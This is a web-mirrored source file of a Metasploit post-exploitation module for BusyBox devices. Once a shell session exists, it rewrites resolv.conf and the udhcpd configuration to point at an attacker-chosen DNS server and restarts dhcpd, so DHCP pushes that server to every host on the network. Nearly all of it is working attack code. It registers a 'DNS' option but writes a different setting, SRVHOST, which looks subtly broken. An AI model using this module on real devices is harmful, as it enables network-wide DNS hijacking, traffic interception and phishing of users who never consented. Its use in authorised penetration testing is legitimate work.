CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/linux/busybox/set_dns.rb
Views: 11704
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8
  include Msf::Post::Linux::BusyBox

9


10
  def initialize

11
    super(

12
      'Name' => 'BusyBox DNS Configuration',

13
      'Description' => %q{

14
        This module will be applied on a session connected to a BusyBox shell. It allows

15
        to set the DNS server on the device executing BusyBox so it will be sent by the

16
        DHCP server to network hosts.

17
      },

18
      'Author' => 'Javier Vicente Vallejo',

19
      'License' => MSF_LICENSE,

20
      'Platform' => ['linux'],

21
      'SessionTypes' => ['shell']

22
    )

23


24
    register_options(

25
      [

26
        OptAddress.new('DNS', [ true, 'The dns server address' ])

27
      ]

28
    )

29
  end

30


31
  def run

32
    print_status('Searching for files to modify dns server.')

33
    if busy_box_file_exist?('/etc/resolv.conf')

34
      modify_resolv_conf

35
    end

36


37
    if busy_box_file_exist?('/etc/udhcpd.conf')

38
      modify_udhcpd_conf

39
    end

40
  end

41


42
  def modify_resolv_conf

43
    print_status('File /etc/resolv.conf found')

44
    if busy_box_write_file('/etc/resolv.conf', "nameserver #{datastore['SRVHOST']}", false)

45
      print_good('DNS server added to resolv.conf')

46
    end

47
  end

48


49
  def modify_udhcpd_conf

50
    print_status('File /etc/udhcpd.conf found')

51


52
    if busy_box_write_file('/etc/udhcpd.conf', "option dns #{datastore['SRVHOST']}", true)

53
      restart_dhcpd('/etc/udhcpd.conf')

54
    else

55
      print_status('Unable to write udhcpd.conf, searching a writable directory...')

56
      writable_directory = busy_box_writable_dir

57
      if writable_directory

58
        print_status("Copying the original udhcpd.conf to #{writable_directory}tmp.conf")

59
        cmd_exec("cp -f /etc/udhcpd.conf #{writable_directory}tmp.conf")

60
        Rex.sleep(0.3)

61
        print_status("Adding DNS to #{writable_directory}tmp.conf")

62
        busy_box_write_file("#{writable_directory}tmp.conf", "option dns #{datastore['SRVHOST']}", true)

63
        restart_dhcpd("#{writable_directory}tmp.conf")

64
      else

65
        print_error('Writable directory not found')

66
      end

67
    end

68
  end

69


70
  def restart_dhcpd(conf)

71
    print_status('Restarting udhcp server')

72
    cmd_exec('killall dhcpd')

73
    # in this case it is necessary to use shell_write. Cmd_exec introduce an echo after the command

74
    # that is going to be executed: <command>;echo <rand_value>. It seems busybox fails to launch dhcpd

75
    # process when it is executed in this way: "dhcpd /etc/udhcpd.conf &; echo <rand_value>"

76
    session.shell_write("dhcpd #{conf} &\n")

77
    print_good('udhcpd.conf modified and DNS server added. DHCPD restarted')

78
  end

79
end

80


81